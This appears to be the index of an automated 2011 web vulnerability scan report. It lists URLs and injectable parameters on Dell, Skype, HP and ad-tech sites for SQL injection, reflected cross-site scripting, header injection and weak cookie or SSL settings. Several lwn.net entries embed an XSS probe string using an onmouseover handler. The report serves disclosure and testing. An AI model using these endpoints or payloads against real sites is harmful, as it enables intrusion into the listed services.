XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09052011-01

Report generated by XSS.CX at Mon Sep 05 07:56:49 GMT-06:00 2011.

1. SQL injection

1.1. http://accessories.us.dell.com/sna/productdetail.aspx [Referer HTTP header]

1.2. http://accessories.us.dell.com/sna/productdetail.aspx [name of an arbitrarily supplied request parameter]

1.3. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 [REST URL parameter 2]

1.4. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 [Referer HTTP header]

1.5. http://community.skype.com/t5/English/ct-p/English [name of an arbitrarily supplied request parameter]

1.6. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment [name of an arbitrarily supplied request parameter]

1.7. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager [name of an arbitrarily supplied request parameter]

1.8. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business [REST URL parameter 3]

1.9. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV [User-Agent HTTP header]

1.10. http://community.skype.com/t5/Support-et-information/bd-p/fr_community [REST URL parameter 3]

1.11. http://community.skype.com/t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058 [name of an arbitrarily supplied request parameter]

1.12. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 [User-Agent HTTP header]

1.13. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242 [name of an arbitrarily supplied request parameter]

1.14. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 [User-Agent HTTP header]

1.15. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 [User-Agent HTTP header]

1.16. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 [Referer HTTP header]

1.17. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true [REST URL parameter 9]

1.18. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1 [name of an arbitrarily supplied request parameter]

1.19. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [Referer HTTP header]

1.20. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [name of an arbitrarily supplied request parameter]

1.21. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/thread [REST URL parameter 4]

1.22. http://community.skype.com/t5/forums/searchpage/tab/message [User-Agent HTTP header]

1.23. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced [REST URL parameter 4]

1.24. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [Referer HTTP header]

1.25. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [User-Agent HTTP header]

1.26. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [name of an arbitrarily supplied request parameter]

1.27. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos [Referer HTTP header]

1.28. http://community.skype.com/t5/help/faqpage/faq-category-id/participation [REST URL parameter 5]

1.29. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [Referer HTTP header]

1.30. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [name of an arbitrarily supplied request parameter]

1.31. http://community.skype.com/t5/help/faqpage/faq-category-id/video [REST URL parameter 5]

1.32. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 2]

1.33. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 3]

1.34. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 [User-Agent HTTP header]

1.35. http://community.skype.com/t5/iPhone/bd-p/iPhone [name of an arbitrarily supplied request parameter]

1.36. http://community.skype.com/t5/notifications/notifymoderatorpage/message-uid/25246 [name of an arbitrarily supplied request parameter]

1.37. http://community.skype.com/t5/tag/Mac/tg-p/category-id/English [REST URL parameter 2]

1.38. http://community.skype.com/t5/tag/Subscription/tg-p/category-id/English [Referer HTTP header]

1.39. http://community.skype.com/t5/tag/Video/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

1.40. http://community.skype.com/t5/tag/call/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

1.41. http://community.skype.com/t5/tag/crash/tg-p/category-id/English [REST URL parameter 6]

1.42. http://community.skype.com/t5/tag/error/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

1.43. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English [Referer HTTP header]

1.44. http://community.skype.com/t5/user/viewprofilepage/user-id/165954 [User-Agent HTTP header]

1.45. http://community.skype.com/t5/user/viewprofilepage/user-id/165958 [REST URL parameter 3]

1.46. http://community.skype.com/t5/user/viewprofilepage/user-id/59914 [REST URL parameter 2]

1.47. http://community.skype.com/t5/user/viewprofilepage/user-id/8 [REST URL parameter 2]

1.48. http://community.skype.com/t5/util/componentrenderpage/component-id/ [name of an arbitrarily supplied request parameter]

1.49. http://search2.skype.com/search/search.cgi [name of an arbitrarily supplied request parameter]

2. HTTP header injection

2.1. http://142.xg4ken.com/media/redir.php [k_clickid parameter]

2.2. http://142.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.2. http://afe.specificclick.net/ [name of an arbitrarily supplied request parameter]

3.3. http://afe.specificclick.net/ [pasmc parameter]

3.4. http://afe.specificclick.net/serve/v=5 [m parameter]

3.5. http://afe.specificclick.net/serve/v=5 [m parameter]

3.6. http://afe.specificclick.net/serve/v=5 [m parameter]

3.7. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

3.8. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

3.9. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

3.10. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.11. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.12. http://apps.sapha.com/appshandler.php [ac parameter]

3.13. http://content-cdn.dell.com/JS/default/jsStrings.ashx [st parameter]

3.14. http://dce.sapha.com/engine.php [ac parameter]

3.15. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [mbox parameter]

3.16. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.catid parameter]

3.17. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.pn parameter]

3.18. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.pt parameter]

3.19. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard [mbox parameter]

3.20. http://ecustomeropinions.com/survey/survey.php [data1 parameter]

3.21. http://h20180.www2.hp.com/apps/Nav [name of an arbitrarily supplied request parameter]

3.22. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 1]

3.23. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 2]

3.24. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 3]

3.25. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 4]

3.26. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 4]

3.27. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 5]

3.28. http://h30187.www3.hp.com/howto_QL_courses.jsp [REST URL parameter 1]

3.29. http://h30187.www3.hp.com/index.jsp [REST URL parameter 1]

3.30. http://h30187.www3.hp.com/is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.31. http://h30187.www3.hp.com/is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.32. http://h30187.www3.hp.com/is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.33. http://h30187.www3.hp.com/is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.34. http://h30187.www3.hp.com/is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.35. http://h30187.www3.hp.com/is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.36. http://h30187.www3.hp.com/is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.37. http://h30187.www3.hp.com/is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.38. http://h30187.www3.hp.com/is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.39. http://h30187.www3.hp.com/is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.40. http://h30187.www3.hp.com/is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.41. http://h30187.www3.hp.com/is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif [REST URL parameter 1]

3.42. http://h30187.www3.hp.com/is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.43. http://h30187.www3.hp.com/is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif [REST URL parameter 1]

3.44. http://h30187.www3.hp.com/pv.gif [REST URL parameter 1]

3.45. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 1]

3.46. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 2]

3.47. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 3]

3.48. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 1]

3.49. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 2]

3.50. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 3]

3.51. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 1]

3.52. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 2]

3.53. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 3]

3.54. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 4]

3.55. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 1]

3.56. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 2]

3.57. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 3]

3.58. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 4]

3.59. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 5]

3.60. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 1]

3.61. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 2]

3.62. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 3]

3.63. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 1]

3.64. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 2]

3.65. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 3]

3.66. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 1]

3.67. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 2]

3.68. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 3]

3.69. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 1]

3.70. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 2]

3.71. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 3]

3.72. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 1]

3.73. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 2]

3.74. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 3]

3.75. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 1]

3.76. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 2]

3.77. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 3]

3.78. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 1]

3.79. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 2]

3.80. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 3]

3.81. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 1]

3.82. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 2]

3.83. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 3]

3.84. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 1]

3.85. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 2]

3.86. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 3]

3.87. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 4]

3.88. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 1]

3.89. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 2]

3.90. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 3]

3.91. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 4]

3.92. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 1]

3.93. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 2]

3.94. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 3]

3.95. https://h41183.www4.hp.com/inflexion/ [jumpid parameter]

3.96. http://js.revsci.net/gateway/gw.js [csid parameter]

3.97. http://lwn.net/Articles/456878/ [REST URL parameter 1]

3.98. http://lwn.net/Articles/456878/ [REST URL parameter 2]

3.99. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter]

3.100. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 1]

3.101. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 2]

3.102. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 3]

3.103. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [format parameter]

3.104. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [name of an arbitrarily supplied request parameter]

3.105. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.106. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.107. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.108. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.109. https://support.skype.com/en-us/glossary [name of an arbitrarily supplied request parameter]

3.110. https://support.skype.com/en-us/search.form [name of an arbitrarily supplied request parameter]

3.111. https://support.skype.com/en-us/search_first/ [name of an arbitrarily supplied request parameter]

3.112. https://support.skype.com/en/faqFeedback.form [name of an arbitrarily supplied request parameter]

3.113. https://support.skype.com/en/glossary [name of an arbitrarily supplied request parameter]

3.114. https://support.skype.com/en/search [name of an arbitrarily supplied request parameter]

3.115. https://support.skype.com/en/search [q parameter]

3.116. https://support.skype.com/en/search.form [name of an arbitrarily supplied request parameter]

3.117. https://support.skype.com/en/support_selection_after_search [name of an arbitrarily supplied request parameter]

3.118. https://support.skype.com/en/tips [name of an arbitrarily supplied request parameter]

3.119. http://trk.etrigue.com/track.php [a parameter]

3.120. http://www.lijit.com/delivery/fp [n parameter]

3.121. http://www.linkedin.com/countserv/count/share [url parameter]

3.122. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.123. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.124. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

3.125. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

3.126. http://www.w3schools.com/js/tryit_view.asp [code parameter]

3.127. http://www.w3schools.com/jsref/tryit_view.asp [code parameter]

3.128. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.129. https://mpsnare.iesnare.com/snare.js [User-Agent HTTP header]

3.130. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.131. http://apps.sapha.com/appshandler.php [sapha_2522_1 cookie]

3.132. http://ecustomeropinions.com/survey/survey.php [server cookie]

3.133. http://ecustomeropinions.com/survey/survey.php [server cookie]

3.134. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]

3.135. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]

4. Flash cross-domain policy

4.1. http://142.xg4ken.com/crossdomain.xml

4.2. http://ad.turn.com/crossdomain.xml

4.3. http://afe.specificclick.net/crossdomain.xml

4.4. http://ajax.googleapis.com/crossdomain.xml

4.5. http://altfarm.mediaplex.com/crossdomain.xml

4.6. http://apps.sapha.com/crossdomain.xml

4.7. http://apr.lijit.com/crossdomain.xml

4.8. http://cache.specificmedia.com/crossdomain.xml

4.9. http://cdn.turn.com/crossdomain.xml

4.10. http://ce.lijit.com/crossdomain.xml

4.11. http://dellinc.tt.omtrdc.net/crossdomain.xml

4.12. http://eas.apm.emediate.eu/crossdomain.xml

4.13. http://fls.doubleclick.net/crossdomain.xml

4.14. https://fls.doubleclick.net/crossdomain.xml

4.15. http://gacela.eu/crossdomain.xml

4.16. http://h41174.www4.hp.com/crossdomain.xml

4.17. http://ib.adnxs.com/crossdomain.xml

4.18. http://img-cdn.mediaplex.com/crossdomain.xml

4.19. http://m.webtrends.com/crossdomain.xml

4.20. http://media.fastclick.net/crossdomain.xml

4.21. http://met1.hp.com/crossdomain.xml

4.22. http://metrics.skype.com/crossdomain.xml

4.23. http://microsoftsto.112.2o7.net/crossdomain.xml

4.24. http://now.eloqua.com/crossdomain.xml

4.25. http://nsm.dell.com/crossdomain.xml

4.26. http://pixel.33across.com/crossdomain.xml

4.27. http://pixel.adsafeprotected.com/crossdomain.xml

4.28. http://pixel.mathtag.com/crossdomain.xml

4.29. http://pixel.quantserve.com/crossdomain.xml

4.30. http://r.turn.com/crossdomain.xml

4.31. http://statse.webtrendslive.com/crossdomain.xml

4.32. http://sync.mathtag.com/crossdomain.xml

4.33. http://tags.bluekai.com/crossdomain.xml

4.34. http://vap1den1.lijit.com/crossdomain.xml

4.35. http://vap1iad1.lijit.com/crossdomain.xml

4.36. http://vap1iad2.lijit.com/crossdomain.xml

4.37. http://vap1sfo1.lijit.com/crossdomain.xml

4.38. http://vap2den1.lijit.com/crossdomain.xml

4.39. http://vap2iad1.lijit.com/crossdomain.xml

4.40. http://vap3den1.lijit.com/crossdomain.xml

4.41. http://www.cymphonix.com/crossdomain.xml

4.42. http://www.xg4ken.com/crossdomain.xml

4.43. http://accessories.us.dell.com/crossdomain.xml

4.44. https://adwords.google.com/crossdomain.xml

4.45. http://blogs.skype.com/crossdomain.xml

4.46. http://content-cdn.dell.com/crossdomain.xml

4.47. http://content.dell.com/crossdomain.xml

4.48. http://disqus.com/crossdomain.xml

4.49. http://embed.technorati.com/crossdomain.xml

4.50. http://h30415.www3.hp.com/crossdomain.xml

4.51. http://h30507.www3.hp.com/crossdomain.xml

4.52. http://h41131.www4.hp.com/crossdomain.xml

4.53. http://i.dell.com/crossdomain.xml

4.54. http://lt.dell.com/crossdomain.xml

4.55. http://pagead2.googlesyndication.com/crossdomain.xml

4.56. https://secure.skypeassets.com/crossdomain.xml

4.57. http://share.skype.com/crossdomain.xml

4.58. http://shop.skype.com/crossdomain.xml

4.59. http://www-cdn.dell.com/crossdomain.xml

4.60. http://www.hp.com/crossdomain.xml

4.61. http://www.ibm.com/crossdomain.xml

4.62. http://www.radware.com/crossdomain.xml

4.63. http://www.skype.com/crossdomain.xml

4.64. http://www.skypeassets.com/crossdomain.xml

4.65. http://www.typepad.com/crossdomain.xml

4.66. http://bit.ly/crossdomain.xml

4.67. http://cymphonix.app3.hubspot.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://met1.hp.com/clientaccesspolicy.xml

5.2. http://metrics.skype.com/clientaccesspolicy.xml

5.3. http://microsoftsto.112.2o7.net/clientaccesspolicy.xml

5.4. http://nsm.dell.com/clientaccesspolicy.xml

5.5. http://pixel.33across.com/clientaccesspolicy.xml

5.6. http://pixel.quantserve.com/clientaccesspolicy.xml

5.7. http://js.microsoft.com/clientaccesspolicy.xml

5.8. http://msdn.microsoft.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

6.2. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

7. SSL cookie without secure flag set

7.1. https://login.skype.com/account/password-reset-request

7.2. https://login.skype.com/password-reset-request

7.3. https://secure.skype.com/account/buy/package

7.4. https://secure.skype.com/account/login

7.5. https://support.skype.com/

7.6. https://adwords.google.com/um/StartNewLogin

7.7. https://developer.skype.com/

7.8. https://developer.skype.com/accessories

7.9. https://developer.skype.com/camera/skype-uvc-extension-unit-specification

7.10. https://developer.skype.com/certification

7.11. https://developer.skype.com/certification/accessories

7.12. https://developer.skype.com/certification/certified-list

7.13. https://developer.skype.com/certification/odm-program

7.14. https://developer.skype.com/images/skype/bgHeaderDashboard.jpg

7.15. https://developer.skype.com/login

7.16. https://developer.skype.com/public/skypekit

7.17. https://developer.skype.com/public/skypekit/

7.18. https://developer.skype.com/resources/logoSkypeDeveloper.gif

7.19. https://developer.skype.com/signup

7.20. https://developer.skype.com/silk

7.21. https://developer.skype.com/skypekit

7.22. https://developer.skype.com/stylesheets/templates/main.css

7.23. https://developer.skype.com/stylesheets/templates/reset.css

7.24. https://developer.skype.com/support

7.25. https://developer.skype.com/support/

7.26. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

7.27. https://login.skype.com/account/

7.28. https://login.skype.com/account/login-form

7.29. https://login.skype.com/account/password-automation

7.30. https://login.skype.com/account/password-token-sent

7.31. https://login.skype.com/account/signup-form

7.32. https://login.skype.com/go/shop

7.33. https://login.skype.com/go/shop.accessories.headsets

7.34. https://login.skype.com/go/shop.accessories.phones

7.35. https://login.skype.com/go/shop.accessories.webcams

7.36. https://login.skype.com/go/shop.extras

7.37. https://login.skype.com/go/skype.manager.setup

7.38. https://login.skype.com/go/tvwebcams

7.39. https://mid.live.com/si/login.aspx/x22

7.40. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

7.41. https://secure.skype.com/login

8. Session token in URL

8.1. http://blogs.skype.com/en/2010/06/

8.2. http://blogs.skype.com/en/campaigns_and_promotions/

8.3. http://blogs.skype.com/en/subscriptions/

8.4. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax

8.5. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

8.6. http://ecustomeropinions.com/survey/survey.php

8.7. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

8.8. http://h30187.www3.hp.com/howto_QL_courses.jsp

8.9. http://h30187.www3.hp.com/is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif

8.10. http://h30187.www3.hp.com/is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

8.11. http://h30187.www3.hp.com/is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif

8.12. http://h30187.www3.hp.com/is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif

8.13. http://h30187.www3.hp.com/is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif

8.14. http://h30187.www3.hp.com/is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif

8.15. http://h30187.www3.hp.com/is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif

8.16. http://h30187.www3.hp.com/is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif

8.17. http://h30187.www3.hp.com/is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif

8.18. http://h30187.www3.hp.com/is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

8.19. http://h30187.www3.hp.com/is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif

8.20. http://h30187.www3.hp.com/is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

8.21. http://h30187.www3.hp.com/is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif

8.22. http://h30187.www3.hp.com/is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

8.23. http://www.facebook.com/extern/login_status.php

8.24. http://www.skype.com/intl/en-us/prices/premium

8.25. http://www.skype.com/intl/en-us/prices/premium/

9. SSL certificate

9.1. https://apps.skypeassets.com/

9.2. https://blogs.skype.com/

9.3. https://chat1.us.dell.com/

9.4. https://h10078.www1.hp.com/

9.5. https://h30046.www3.hp.com/

9.6. https://h41183.www4.hp.com/

9.7. https://mpsnare.iesnare.com/

9.8. https://skypecasts.skype.com/

9.9. https://www.trustwave.com/

9.10. https://adwords.google.com/

9.11. https://connect.facebook.net/

9.12. https://developer.skype.com/

9.13. https://fls.doubleclick.net/

9.14. https://login.barracuda.com/

9.15. https://login.skype.com/

9.16. https://mid.live.com/

9.17. https://secure.skype.com/

9.18. https://secure.skypeassets.com/

9.19. https://support.skype.com/

10. Cookie scoped to parent domain

10.1. https://login.skype.com/account/password-reset-request

10.2. https://login.skype.com/password-reset-request

10.3. https://mpsnare.iesnare.com/snare.js

10.4. http://msite.martiniadnetwork.com/index/

10.5. https://secure.skype.com/account/buy/package

10.6. https://secure.skype.com/account/login

10.7. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps

10.8. http://142.xg4ken.com/media/redir.php

10.9. http://accessories.us.dell.com/sna/DellPartsFamily.aspx

10.10. http://accessories.us.dell.com/sna/ShopAllBrands.aspx

10.11. http://accessories.us.dell.com/sna/batteryconfig.aspx

10.12. http://accessories.us.dell.com/sna/category.aspx

10.13. http://accessories.us.dell.com/sna/category.aspx

10.14. http://accessories.us.dell.com/sna/default.aspx

10.15. http://accessories.us.dell.com/sna/memconfig.aspx

10.16. http://accessories.us.dell.com/sna/printersupplies.aspx

10.17. http://accessories.us.dell.com/sna/productdetail.aspx

10.18. http://accessories.us.dell.com/sna/sna.aspx

10.19. http://apr.lijit.com///www/delivery/ajs.php

10.20. http://b.scorecardresearch.com/b

10.21. http://b.scorecardresearch.com/p

10.22. http://b.scorecardresearch.com/r

10.23. http://ce.lijit.com/merge

10.24. http://community.skype.com/t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

10.25. http://community.skype.com/t5/English/ct-p/English

10.26. http://community.skype.com/t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36

10.27. http://content.dell.com/us/en/business/security-network.aspx

10.28. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/

10.29. http://dce.sapha.com/logging.php

10.30. http://h30434.www3.hp.com/

10.31. http://ib.adnxs.com/mapuid

10.32. http://id.google.com/verify/EAAAABu2UstRRffrSR7oBrVqvsg.gif

10.33. http://id.google.com/verify/EAAAAD62iUELm6gGoNz_95wbJa0.gif

10.34. http://id.google.com/verify/EAAAADICz-2SCXX7DbRNblZyv5k.gif

10.35. https://login.skype.com/account/

10.36. https://login.skype.com/account/login-form

10.37. https://login.skype.com/account/password-automation

10.38. https://login.skype.com/account/password-token-sent

10.39. https://login.skype.com/account/signup-form

10.40. https://login.skype.com/go/shop

10.41. https://login.skype.com/go/shop.accessories.headsets

10.42. https://login.skype.com/go/shop.accessories.phones

10.43. https://login.skype.com/go/shop.accessories.webcams

10.44. https://login.skype.com/go/shop.extras

10.45. https://login.skype.com/go/skype.manager.setup

10.46. https://login.skype.com/go/tvwebcams

10.47. http://media.fastclick.net/w/tre

10.48. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852

10.49. http://pixel.33across.com/ps/

10.50. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif

10.51. http://pixel.quantserve.com/pixel/p-56WJ0KtIxWJ_2.gif

10.52. http://r.turn.com/r/beacon

10.53. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210

10.54. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836

10.55. http://search.dell.com/public/css.aspx

10.56. http://search.dell.com/public/menu.aspx

10.57. http://search.dell.com/results.aspx

10.58. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message

10.59. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

10.60. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message

10.61. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

